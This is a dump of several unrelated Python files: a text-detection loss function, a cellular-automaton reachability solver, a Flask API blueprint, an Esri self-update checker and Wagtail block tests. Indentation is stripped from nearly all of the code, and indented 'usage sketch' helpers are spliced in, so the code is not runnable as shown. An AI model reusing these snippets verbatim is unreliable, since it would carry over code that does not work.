vertex_beta = 1 - (tf.reduce_mean(y_true[:, :, :, 1:2])
/ (tf.reduce_mean(labels) + cfg.epsilon))
vertex_predicts = tf.nn.sigmoid(vertex_logits)
pos = -1 * vertex_beta * vertex_labels * tf.log(vertex_predicts +
cfg.epsilon)
neg = -1 * (1 - vertex_beta) * (1 - vertex_labels) * tf.log(
1 - vertex_predicts + cfg.epsilon)
positive_weights = tf.cast(tf.equal(y_true[:, :, :, 0], 1), tf.float32)
side_vertex_code_loss = \
tf.reduce_sum(tf.reduce_sum(pos + neg, axis=-1) * positive_weights) / (
tf.reduce_sum(positive_weights) + cfg.epsilon)
side_vertex_code_loss *= cfg.lambda_side_vertex_code_loss
# loss for side_vertex_coord delta
g_hat = y_pred[:, :, :, 3:]
g_true = y_true[:, :, :, 3:]
vertex_weights = tf.cast(tf.equal(y_true[:, :, :, 1], 1), tf.float32)
pixel_wise_smooth_l1norm = smooth_l1_loss(g_hat, g_true, vertex_weights)
side_vertex_coord_loss = tf.reduce_sum(pixel_wise_smooth_l1norm) / (
tf.reduce_sum(vertex_weights) + cfg.epsilon)
side_vertex_coord_loss *= cfg.lambda_side_vertex_coord_loss
return inside_score_loss + side_vertex_code_loss + side_vertex_coord_loss
def smooth_l1_loss(prediction_tensor, target_tensor, weights):
n_q = tf.reshape(quad_norm(target_tensor), tf.shape(weights))
diff = prediction_tensor - target_tensor
abs_diff = tf.abs(diff)
abs_diff_lt_1 = tf.less(abs_diff, 1)
pixel_wise_smooth_l1norm = (tf.reduce_sum(
tf.where(abs_diff_lt_1, 0.5 * tf.square(abs_diff), abs_diff - 0.5),
axis=-1) / n_q) * weights
return pixel_wise_smooth_l1norm
def quad_norm(g_true):
shape = tf.shape(g_true)
delta_xy_matrix = tf.reshape(g_true, [-1, 2, 2])
diff = delta_xy_matrix[:, 0:1, :] - delta_xy_matrix[:, 1:2, :]
square = tf.square(diff)
distance = tf.sqrt(tf.reduce_sum(square, axis=-1))
distance *= 4.0
distance += cfg.epsilon
return tf.reshape(distance, shape[:-1])
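def _quad_loss_usage_sketch(east_model, train_images, train_geometry_maps):
    """Usage sketch, illustrative only and not part of the original file: quad_loss has the
    (y_true, y_pred) signature Keras expects, so it can be passed straight to compile().
    `east_model` is a placeholder for a network producing the 7-channel map this loss assumes
    (1 inside-score channel + 2 side-vertex-code channels + 4 side-vertex-coord channels)."""
    east_model.compile(optimizer='adam', loss=quad_loss)
    east_model.fit(train_images, train_geometry_maps, batch_size=8, epochs=1)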
|
import sys
import itertools
#define constants, functions
BYTE_SIZE = 8;
append_zeros = lambda bit_pattern, ideal_size: "0"*(ideal_size-len(bit_pattern))+bit_pattern;
#backtrack over a list of SETS, where each SET holds all possible 3-bit predecessor neighborhoods for a position;
#the recursion then checks whether those neighborhoods can be chained consistently (including wrap-around)
def backtrack(input_seq, new_state_map):
#prepare a set of possible 'previous values' for each position in the input sequence
solution_set = [];
for index, digit in enumerate(input_seq):
possible_vals = [ append_zeros(bin(index)[2:], 3) for index, element in enumerate(new_state_map) if (element == digit) ];
solution_set.append(possible_vals);
#start recursive backtracking
def prepare_candidates(solution_set, solution_vector):
if (solution_vector):
return [ element for element in solution_set[len(solution_vector)] if (solution_vector[-1][1:] == element[:1+1]) ]
else:
return solution_set[0];
def recur_backtrack(solution_set, solution_vector=[], solution=[False]):
#check if the answer's been found
if (len(solution_vector) == len(solution_set)):
if (solution_vector[-1][1:] == solution_vector[0][:1+1]):
solution[0] = True;
else:
#prepare a list of candidates for the next step
candidate_list = prepare_candidates(solution_set, solution_vector);
for candidate in candidate_list:
#add the candidate to the solution vector
solution_vector.append(candidate);
#check if we have the correct solution
recur_backtrack(solution_set, solution_vector, solution);
#pop-out the candidate
solution_vector.pop();
#return the output
boolean_val = [False];
recur_backtrack(solution_set, solution=boolean_val);
return boolean_val[0];
#read input from the file
raw_input = open("input_test_case", "r").read();
raw_input = raw_input.split('\n');
raw_input = [ line.split(' ') for line in raw_input ];
#process each test separately
for test in raw_input:
#map input cell pattern to output cell pattern
append_zeros = lambda bit_pattern, ideal_size: "0"*(ideal_size-len(bit_pattern))+bit_pattern;
new_state_map = bin(int(test[0]))[2:];
new_state_map = append_zeros(new_state_map, BYTE_SIZE);
#start backtracking
if (backtrack(test[2], new_state_map)):
print('REACHABLE');
else:
print('GARDEN OF EDEN');
#print(raw_input);
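#illustrative sketch, not part of the original script: calling backtrack() on a single hand-made case
#instead of reading the input file. The rule/next-generation values below are placeholders; the state
#map is built exactly as in the main loop above (bin(rule) zero-padded to BYTE_SIZE bits).
def reachability_sketch(example_rule=110, example_next_gen="0110"):
    state_map = append_zeros(bin(example_rule)[2:], BYTE_SIZE);
    #True -> some previous generation exists ('REACHABLE'); False -> 'GARDEN OF EDEN'
    return backtrack(example_next_gen, state_map);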
|
from flask import json, jsonify, Blueprint
from extensions import db
from models import *
from sqlalchemy.ext.declarative import DeclarativeMeta
players_blueprint = Blueprint('players', __name__)
@players_blueprint.route('/api/players', methods=['GET'])
def players():
return jsonify([to_dict(player) for player in Players.query.all()])
#players = db.session.query(Players).all()
#arr = []
#for player in players:
# arr.append(player.serialize())
#return jsonify({"data": arr})
def to_dict(obj):
if isinstance(obj.__class__, DeclarativeMeta):
# an SQLAlchemy class
fields = {}
for field in [x for x in dir(obj) if not x.startswith('_') and x != 'metadata']:
data = obj.__getattribute__(field)
try:
json.dumps(data) # this will fail on non-encodable values, like other classes
if data is not None:
fields[field] = data
except TypeError:
pass
# a json-encodable dict
return fields
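def _app_factory_sketch():
    """Usage sketch, illustrative only and not part of the original module: the blueprint only serves
    requests once registered on a Flask app. Assumes `db` from extensions is a flask_sqlalchemy
    SQLAlchemy instance; the real project may wire this up differently."""
    from flask import Flask
    app = Flask(__name__)
    db.init_app(app)                           # bind the SQLAlchemy extension to this app
    app.register_blueprint(players_blueprint)  # exposes GET /api/players
    return app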
|
# ------------------------------------------------------------------------------
# Copyright 2013 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
# Name: ProgramCheckandUpdate.py
# Description: Checks and Updates workflow from Github if required.
# Version: 20191117
# Requirements:
# Author: Esri Imagery Workflows team
# ------------------------------------------------------------------------------
#!/usr/bin/env python
from datetime import datetime
import datetime as dt
import json
import os
import io
import requests
import zipfile
from dateutil.relativedelta import *
class ProgramCheckAndUpdate(object):
def readCheckForUpdate(self, filepath):
dict_check = {}
try:
with open(filepath) as f:
content = f.read()
dict_check = json.loads(content)
return dict_check
except BaseException:
return None
def readVersionJSON(self, checkFileURL):
try:
f = requests.get(checkFileURL)
x = f.content
versionJSON = json.loads(x)
return versionJSON
except BaseException:
return None
def checkUpdate(self, dict_check, versionJSON):
try:
current_date = datetime.today().strftime('%Y-%m-%d')
latest_version = versionJSON['Version']
dict_check['LastChecked'] = current_date
currentVersion = dict_check['CurrentVersion']
if(latest_version > currentVersion):
dict_check['NewVersion'] = versionJSON['Version']
dict_check['VersionMessage'] = versionJSON['Message']
dict_check['UpdateLocation'] = versionJSON['Install']
return[True, dict_check]
else:
return[False, dict_check]
except BaseException:
return [False, None]
def UpdateLocalRepo(self, install_url, path):
if(install_url.endswith('/')):
download_url = install_url + 'archive/master.zip'
else:
download_url = install_url + '/archive/master.zip'
repo_download = requests.get(download_url)
zip_repo = zipfile.ZipFile(io.BytesIO(repo_download.content))
zip_repo.extractall(path)
def WriteNewCheckForUpdate(self, dict_check, filepath):
try:
with open(filepath, 'w') as f:
json.dump(dict_check, f, indent=4)
return True
except BaseException:
return False
def IsCheckRequired(self, dict_check):
try:
currentVersion = dict_check['CurrentVersion']
if("LastChecked" in dict_check.keys()):
if(dict_check["LastChecked"] == ""):
lastChecked = "1970-01-01"
else:
lastChecked = dict_check['LastChecked']
else:
lastChecked = "1970-01-01"
lastChecked_dateobj = datetime.strptime(lastChecked, '%Y-%m-%d')
checkForUpdate = dict_check['CheckForUpdate']
current_date = datetime.today().strftime('%Y-%m-%d')
if(checkForUpdate == "Never"):
return False
elif(checkForUpdate == "Daily"):
if(current_date > lastChecked):
return True
else:
return False
elif(checkForUpdate == "Monthly"):
update_date = (lastChecked_dateobj + dt.timedelta(days=+30)).strftime('%Y-%m-%d')
if(current_date > update_date):
return True
else:
return False
except BaseException:
return None
def run(self, localrepo_path):
try:
checkUpdateFilePath = os.path.join(localrepo_path, "CheckForUpdate.json")
chkupdate = self.readCheckForUpdate(checkUpdateFilePath)
if chkupdate is None:
return "Unable to read CheckForUpdate JSON"
if(self.IsCheckRequired(chkupdate)):
versionJSON = self.readVersionJSON(checkFileURL=chkupdate['CheckFile'])
if versionJSON is None:
return "Unable to read VersionJSON"
[update_available, dict_check] = self.checkUpdate(chkupdate, versionJSON)
self.WriteNewCheckForUpdate(dict_check, checkUpdateFilePath)
if(update_available):
if(dict_check['OnNewVersion'] == "Warn"):
return("Update Available. Please read " + str(checkUpdateFilePath))
elif(dict_check['OnNewVersion'] == "Ignore"):
return("Ignore")
elif(dict_check['OnNewVersion'] == "Update"):
self.UpdateLocalRepo(versionJSON['Install'], path=os.path.join((os.path.dirname(localrepo_path)), "Updated"))
else:
return("Incorrect Parameter. Please check OnNewVersion Parameter in " + str(checkUpdateFilePath))
else:
return("Installed version is the latest version.")
else:
try:
                    if(chkupdate.get('NewVersion') not in (None, '')):
return("Update Available. Please read "+ str(checkUpdateFilePath))
current_date = datetime.today().strftime('%Y-%m-%d')
chkupdate['LastChecked'] = current_date
self.WriteNewCheckForUpdate(chkupdate, checkUpdateFilePath)
except Exception as e:
return(str(e))
except Exception as e:
return str(e)
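# Usage sketch, illustrative only and not part of the original file: run() expects the folder holding
# CheckForUpdate.json and returns a human-readable status string. The path below is a placeholder.
if __name__ == '__main__':
    updater = ProgramCheckAndUpdate()
    print(updater.run(r'C:\workflows\MyWorkflow'))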
|
# -*- coding: utf-8 -*
import base64
import collections
import json
import unittest
from datetime import date, datetime
from decimal import Decimal
from django import forms
from django.core.exceptions import ValidationError
from django.forms.utils import ErrorList
from django.template.loader import render_to_string
from django.test import SimpleTestCase, TestCase
from django.utils.html import format_html
from django.utils.safestring import SafeData, SafeText, mark_safe
# non-standard import name for gettext_lazy, to prevent strings from being picked up for translation
from django.utils.translation import gettext_lazy as __
from wagtail.core import blocks
from wagtail.core.models import Page
from wagtail.core.rich_text import RichText
from wagtail.tests.testapp.blocks import LinkBlock as CustomLinkBlock
from wagtail.tests.testapp.blocks import SectionBlock
from wagtail.tests.testapp.models import EventPage, SimplePage
from wagtail.tests.utils import WagtailTestUtils
class FooStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
error = 'At least one block must say "foo"'
def clean(self, value):
value = super().clean(value)
if not any(block.value == 'foo' for block in value):
raise blocks.StreamBlockValidationError(non_block_errors=ErrorList([self.error]))
return value
class ContextCharBlock(blocks.CharBlock):
def get_context(self, value, parent_context=None):
value = str(value).upper()
return super(blocks.CharBlock, self).get_context(value, parent_context)
class TestFieldBlock(WagtailTestUtils, SimpleTestCase):
def test_charfield_render(self):
block = blocks.CharBlock()
html = block.render("Hello world!")
self.assertEqual(html, "Hello world!")
def test_charfield_render_with_template(self):
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
html = block.render("Hello world!")
self.assertEqual(html, '<h1>Hello world!</h1>')
def test_charfield_form_classname(self):
"""
Meta data test for FormField; this checks if both the meta values
form_classname and classname are accepted and are rendered
in the form
"""
block = blocks.CharBlock(
form_classname='special-char-formclassname'
)
html = block.render_form("Hello world!")
self.assertEqual(html.count(' special-char-formclassname'), 1)
# Checks if it is backward compatible with classname
block_with_classname = blocks.CharBlock(
classname='special-char-classname'
)
html = block_with_classname.render_form("Hello world!")
self.assertEqual(html.count(' special-char-classname'), 1)
def test_charfield_render_with_template_with_extra_context(self):
block = ContextCharBlock(template='tests/blocks/heading_block.html')
html = block.render("Bonjour le monde!", context={
'language': 'fr',
})
self.assertEqual(html, '<h1 lang="fr">BONJOUR LE MONDE!</h1>')
def test_charfield_render_form(self):
block = blocks.CharBlock()
html = block.render_form("Hello world!")
self.assertIn('<div class="field char_field widget-text_input">', html)
self.assertInHTML('<input id="" name="" placeholder="" type="text" value="Hello world!" />', html)
def test_charfield_render_form_with_prefix(self):
block = blocks.CharBlock()
html = block.render_form("Hello world!", prefix='foo')
self.assertInHTML('<input id="foo" name="foo" placeholder="" type="text" value="Hello world!" />', html)
def test_charfield_render_form_with_error(self):
block = blocks.CharBlock()
html = block.render_form(
"Hello world!",
errors=ErrorList([ValidationError("This field is required.")]))
self.assertIn('This field is required.', html)
def test_charfield_searchable_content(self):
block = blocks.CharBlock()
content = block.get_searchable_content("Hello world!")
self.assertEqual(content, ["Hello world!"])
def test_charfield_with_validator(self):
def validate_is_foo(value):
if value != 'foo':
raise ValidationError("Value must be 'foo'")
block = blocks.CharBlock(validators=[validate_is_foo])
with self.assertRaises(ValidationError):
block.clean("bar")
def test_choicefield_render(self):
class ChoiceBlock(blocks.FieldBlock):
field = forms.ChoiceField(choices=(
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
))
block = ChoiceBlock()
html = block.render('choice-2')
self.assertEqual(html, "choice-2")
def test_choicefield_render_form(self):
class ChoiceBlock(blocks.FieldBlock):
field = forms.ChoiceField(choices=(
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
))
block = ChoiceBlock()
html = block.render_form('choice-2')
self.assertIn('<div class="field choice_field widget-select">', html)
self.assertTagInHTML('<select id="" name="" placeholder="">', html)
self.assertInHTML('<option value="choice-1">Choice 1</option>', html)
self.assertInHTML('<option value="choice-2" selected="selected">Choice 2</option>', html)
def test_searchable_content(self):
"""
FieldBlock should not return anything for `get_searchable_content` by
default. Subclasses are free to override it and provide relevant
content.
"""
class CustomBlock(blocks.FieldBlock):
field = forms.CharField(required=True)
block = CustomBlock()
self.assertEqual(block.get_searchable_content("foo bar"), [])
def test_form_handling_is_independent_of_serialisation(self):
class Base64EncodingCharBlock(blocks.CharBlock):
"""A CharBlock with a deliberately perverse JSON (de)serialisation format
so that it visibly blows up if we call to_python / get_prep_value where we shouldn't"""
def to_python(self, jsonish_value):
# decode as base64 on the way out of the JSON serialisation
return base64.b64decode(jsonish_value)
def get_prep_value(self, native_value):
# encode as base64 on the way into the JSON serialisation
return base64.b64encode(native_value)
block = Base64EncodingCharBlock()
form_html = block.render_form('hello world', 'title')
self.assertIn('value="hello world"', form_html)
value_from_form = block.value_from_datadict({'title': 'hello world'}, {}, 'title')
self.assertEqual('hello world', value_from_form)
def test_widget_media(self):
class CalendarWidget(forms.TextInput):
@property
def media(self):
return forms.Media(
css={'all': ('pretty.css',)},
js=('animations.js', 'actions.js')
)
class CalenderBlock(blocks.FieldBlock):
def __init__(self, required=True, help_text=None, max_length=None, min_length=None, **kwargs):
# Set widget to CalenderWidget
self.field = forms.CharField(
required=required,
help_text=help_text,
max_length=max_length,
min_length=min_length,
widget=CalendarWidget(),
)
super(blocks.FieldBlock, self).__init__(**kwargs)
block = CalenderBlock()
self.assertIn('pretty.css', ''.join(block.all_media().render_css()))
self.assertIn('animations.js', ''.join(block.all_media().render_js()))
def test_prepare_value_called(self):
"""
Check that Field.prepare_value is called before sending the value to
the widget for rendering.
Actual real-world use case: A Youtube field that produces YoutubeVideo
instances from IDs, but videos are entered using their full URLs.
"""
class PrefixWrapper:
prefix = 'http://example.com/'
def __init__(self, value):
self.value = value
def with_prefix(self):
return self.prefix + self.value
@classmethod
def from_prefixed(cls, value):
if not value.startswith(cls.prefix):
raise ValueError
return cls(value[len(cls.prefix):])
def __eq__(self, other):
return self.value == other.value
class PrefixField(forms.Field):
def clean(self, value):
value = super().clean(value)
return PrefixWrapper.from_prefixed(value)
def prepare_value(self, value):
return value.with_prefix()
class PrefixedBlock(blocks.FieldBlock):
def __init__(self, required=True, help_text='', **kwargs):
super().__init__(**kwargs)
self.field = PrefixField(required=required, help_text=help_text)
block = PrefixedBlock()
# Check that the form value is serialized with a prefix correctly
value = PrefixWrapper('foo')
html = block.render_form(value, 'url')
self.assertInHTML(
'<input id="url" name="url" placeholder="" type="text" value="{}" />'.format(
value.with_prefix()),
html)
        # Check that the value was coerced back to a PrefixWrapper
data = {'url': 'http://example.com/bar'}
new_value = block.clean(block.value_from_datadict(data, {}, 'url'))
self.assertEqual(new_value, PrefixWrapper('bar'))
class TestIntegerBlock(unittest.TestCase):
def test_type(self):
block = blocks.IntegerBlock()
digit = block.value_from_form(1234)
self.assertEqual(type(digit), int)
def test_render(self):
block = blocks.IntegerBlock()
digit = block.value_from_form(1234)
self.assertEqual(digit, 1234)
def test_render_required_error(self):
block = blocks.IntegerBlock()
with self.assertRaises(ValidationError):
block.clean("")
def test_render_max_value_validation(self):
block = blocks.IntegerBlock(max_value=20)
with self.assertRaises(ValidationError):
block.clean(25)
def test_render_min_value_validation(self):
block = blocks.IntegerBlock(min_value=20)
with self.assertRaises(ValidationError):
block.clean(10)
def test_render_with_validator(self):
def validate_is_even(value):
if value % 2 > 0:
raise ValidationError("Value must be even")
block = blocks.IntegerBlock(validators=[validate_is_even])
with self.assertRaises(ValidationError):
block.clean(3)
class TestEmailBlock(unittest.TestCase):
def test_render(self):
block = blocks.EmailBlock()
email = block.render("example@email.com")
self.assertEqual(email, "example@email.com")
def test_render_required_error(self):
block = blocks.EmailBlock()
with self.assertRaises(ValidationError):
block.clean("")
def test_format_validation(self):
block = blocks.EmailBlock()
with self.assertRaises(ValidationError):
block.clean("example.email.com")
def test_render_with_validator(self):
def validate_is_example_domain(value):
if not value.endswith('@example.com'):
raise ValidationError("E-mail address must end in @example.com")
block = blocks.EmailBlock(validators=[validate_is_example_domain])
with self.assertRaises(ValidationError):
block.clean("foo@example.net")
class TestBlockQuoteBlock(unittest.TestCase):
def test_render(self):
block = blocks.BlockQuoteBlock()
quote = block.render("Now is the time...")
self.assertEqual(quote, "<blockquote>Now is the time...</blockquote>")
def test_render_with_validator(self):
def validate_is_proper_story(value):
if not value.startswith('Once upon a time'):
raise ValidationError("Value must be a proper story")
block = blocks.BlockQuoteBlock(validators=[validate_is_proper_story])
with self.assertRaises(ValidationError):
block.clean("A long, long time ago")
class TestFloatBlock(TestCase):
def test_type(self):
block = blocks.FloatBlock()
block_val = block.value_from_form(float(1.63))
self.assertEqual(type(block_val), float)
def test_render(self):
block = blocks.FloatBlock()
test_val = float(1.63)
block_val = block.value_from_form(test_val)
self.assertEqual(block_val, test_val)
def test_raises_required_error(self):
block = blocks.FloatBlock()
with self.assertRaises(ValidationError):
block.clean("")
def test_raises_max_value_validation_error(self):
block = blocks.FloatBlock(max_value=20)
with self.assertRaises(ValidationError):
block.clean('20.01')
def test_raises_min_value_validation_error(self):
block = blocks.FloatBlock(min_value=20)
with self.assertRaises(ValidationError):
block.clean('19.99')
def test_render_with_validator(self):
def validate_is_even(value):
if value % 2 > 0:
raise ValidationError("Value must be even")
block = blocks.FloatBlock(validators=[validate_is_even])
with self.assertRaises(ValidationError):
block.clean('3.0')
class TestDecimalBlock(TestCase):
def test_type(self):
block = blocks.DecimalBlock()
block_val = block.value_from_form(Decimal('1.63'))
self.assertEqual(type(block_val), Decimal)
def test_render(self):
block = blocks.DecimalBlock()
test_val = Decimal(1.63)
block_val = block.value_from_form(test_val)
self.assertEqual(block_val, test_val)
def test_raises_required_error(self):
block = blocks.DecimalBlock()
with self.assertRaises(ValidationError):
block.clean("")
def test_raises_max_value_validation_error(self):
block = blocks.DecimalBlock(max_value=20)
with self.assertRaises(ValidationError):
block.clean('20.01')
def test_raises_min_value_validation_error(self):
block = blocks.DecimalBlock(min_value=20)
with self.assertRaises(ValidationError):
block.clean('19.99')
def test_render_with_validator(self):
def validate_is_even(value):
if value % 2 > 0:
raise ValidationError("Value must be even")
block = blocks.DecimalBlock(validators=[validate_is_even])
with self.assertRaises(ValidationError):
block.clean('3.0')
class TestRegexBlock(TestCase):
def test_render(self):
block = blocks.RegexBlock(regex=r'^[0-9]{3}$')
test_val = '123'
block_val = block.value_from_form(test_val)
self.assertEqual(block_val, test_val)
def test_raises_required_error(self):
block = blocks.RegexBlock(regex=r'^[0-9]{3}$')
with self.assertRaises(ValidationError) as context:
block.clean("")
self.assertIn('This field is required.', context.exception.messages)
def test_raises_custom_required_error(self):
test_message = 'Oops, you missed a bit.'
block = blocks.RegexBlock(regex=r'^[0-9]{3}$', error_messages={
'required': test_message,
})
with self.assertRaises(ValidationError) as context:
block.clean("")
self.assertIn(test_message, context.exception.messages)
def test_raises_validation_error(self):
block = blocks.RegexBlock(regex=r'^[0-9]{3}$')
with self.assertRaises(ValidationError) as context:
block.clean("[/]")
self.assertIn('Enter a valid value.', context.exception.messages)
def test_raises_custom_error_message(self):
test_message = 'Not a valid library card number.'
block = blocks.RegexBlock(regex=r'^[0-9]{3}$', error_messages={
'invalid': test_message
})
with self.assertRaises(ValidationError) as context:
block.clean("[/]")
self.assertIn(test_message, context.exception.messages)
html = block.render_form(
"[/]",
errors=ErrorList([ValidationError(test_message)]))
self.assertIn(test_message, html)
def test_render_with_validator(self):
def validate_is_foo(value):
if value != 'foo':
raise ValidationError("Value must be 'foo'")
block = blocks.RegexBlock(regex=r'^.*$', validators=[validate_is_foo])
with self.assertRaises(ValidationError):
block.clean('bar')
class TestRichTextBlock(TestCase):
fixtures = ['test.json']
def test_get_default_with_fallback_value(self):
default_value = blocks.RichTextBlock().get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '')
def test_get_default_with_default_none(self):
default_value = blocks.RichTextBlock(default=None).get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '')
def test_get_default_with_empty_string(self):
default_value = blocks.RichTextBlock(default='').get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '')
def test_get_default_with_nonempty_string(self):
default_value = blocks.RichTextBlock(default='<p>foo</p>').get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '<p>foo</p>')
def test_get_default_with_richtext_value(self):
default_value = blocks.RichTextBlock(default=RichText('<p>foo</p>')).get_default()
self.assertIsInstance(default_value, RichText)
self.assertEqual(default_value.source, '<p>foo</p>')
def test_render(self):
block = blocks.RichTextBlock()
value = RichText('<p>Merry <a linktype="page" id="4">Christmas</a>!</p>')
result = block.render(value)
self.assertEqual(
result, '<p>Merry <a href="/events/christmas/">Christmas</a>!</p>'
)
def test_render_form(self):
"""
render_form should produce the editor-specific rendition of the rich text value
(which includes e.g. 'data-linktype' attributes on <a> elements)
"""
block = blocks.RichTextBlock(editor='hallo')
value = RichText('<p>Merry <a linktype="page" id="4">Christmas</a>!</p>')
result = block.render_form(value, prefix='richtext')
self.assertIn(
(
'<p>Merry <a data-linktype="page" data-id="4"'
' data-parent-id="3" href="/events/christmas/">Christmas</a>!</p>'
),
result
)
def test_validate_required_richtext_block(self):
block = blocks.RichTextBlock()
with self.assertRaises(ValidationError):
block.clean(RichText(''))
def test_validate_non_required_richtext_block(self):
block = blocks.RichTextBlock(required=False)
result = block.clean(RichText(''))
self.assertIsInstance(result, RichText)
self.assertEqual(result.source, '')
def test_render_with_validator(self):
def validate_contains_foo(value):
if 'foo' not in value:
raise ValidationError("Value must contain 'foo'")
block = blocks.RichTextBlock(validators=[validate_contains_foo])
with self.assertRaises(ValidationError):
block.clean(RichText('<p>bar</p>'))
def test_get_searchable_content(self):
block = blocks.RichTextBlock()
value = RichText(
'<p>Merry <a linktype="page" id="4">Christmas</a>! & a happy new year</p>\n'
'<p>Our Santa pet <b>Wagtail</b> has some cool stuff in store for you all!</p>'
)
result = block.get_searchable_content(value)
self.assertEqual(
result, [
'Merry Christmas! & a happy new year \n'
'Our Santa pet Wagtail has some cool stuff in store for you all!'
]
)
def test_get_searchable_content_whitespace(self):
block = blocks.RichTextBlock()
value = RichText('<p>mashed</p><p>po<i>ta</i>toes</p>')
result = block.get_searchable_content(value)
self.assertEqual(result, ['mashed potatoes'])
class TestChoiceBlock(WagtailTestUtils, SimpleTestCase):
def setUp(self):
from django.db.models.fields import BLANK_CHOICE_DASH
self.blank_choice_dash_label = BLANK_CHOICE_DASH[0][1]
def test_render_required_choice_block(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')])
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
# blank option should still be rendered for required fields
# (we may want it as an initial value)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_required_choice_block_with_default(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], default='tea')
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
# blank option should NOT be rendered if default and required are set.
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_required_choice_block_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee')]
block = blocks.ChoiceBlock(choices=callable_choices)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
# blank option should still be rendered for required fields
# (we may want it as an initial value)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_validate_required_choice_block(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')])
self.assertEqual(block.clean('coffee'), 'coffee')
with self.assertRaises(ValidationError):
block.clean('whisky')
with self.assertRaises(ValidationError):
block.clean('')
with self.assertRaises(ValidationError):
block.clean(None)
def test_render_non_required_choice_block(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], required=False)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_non_required_choice_block_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee')]
block = blocks.ChoiceBlock(choices=callable_choices, required=False)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_validate_non_required_choice_block(self):
block = blocks.ChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], required=False)
self.assertEqual(block.clean('coffee'), 'coffee')
with self.assertRaises(ValidationError):
block.clean('whisky')
self.assertEqual(block.clean(''), '')
self.assertEqual(block.clean(None), '')
def test_render_choice_block_with_existing_blank_choice(self):
block = blocks.ChoiceBlock(
choices=[('tea', 'Tea'), ('coffee', 'Coffee'), ('', 'No thanks')],
required=False)
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee">Coffee</option>', html)
def test_render_choice_block_with_existing_blank_choice_and_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee'), ('', 'No thanks')]
block = blocks.ChoiceBlock(
choices=callable_choices,
required=False)
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertIn('<option value="coffee">Coffee</option>', html)
def test_named_groups_without_blank_option(self):
block = blocks.ChoiceBlock(
choices=[
('Alcoholic', [
('gin', 'Gin'),
('whisky', 'Whisky'),
]),
('Non-alcoholic', [
('tea', 'Tea'),
('coffee', 'Coffee'),
]),
])
# test rendering with the blank option selected
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="" selected="selected">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertIn('<option value="tea">Tea</option>', html)
# test rendering with a non-blank option selected
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
def test_named_groups_with_blank_option(self):
block = blocks.ChoiceBlock(
choices=[
('Alcoholic', [
('gin', 'Gin'),
('whisky', 'Whisky'),
]),
('Non-alcoholic', [
('tea', 'Tea'),
('coffee', 'Coffee'),
]),
('Not thirsty', [
('', 'No thanks')
]),
],
required=False)
# test rendering with the blank option selected
html = block.render_form(None, prefix='beverage')
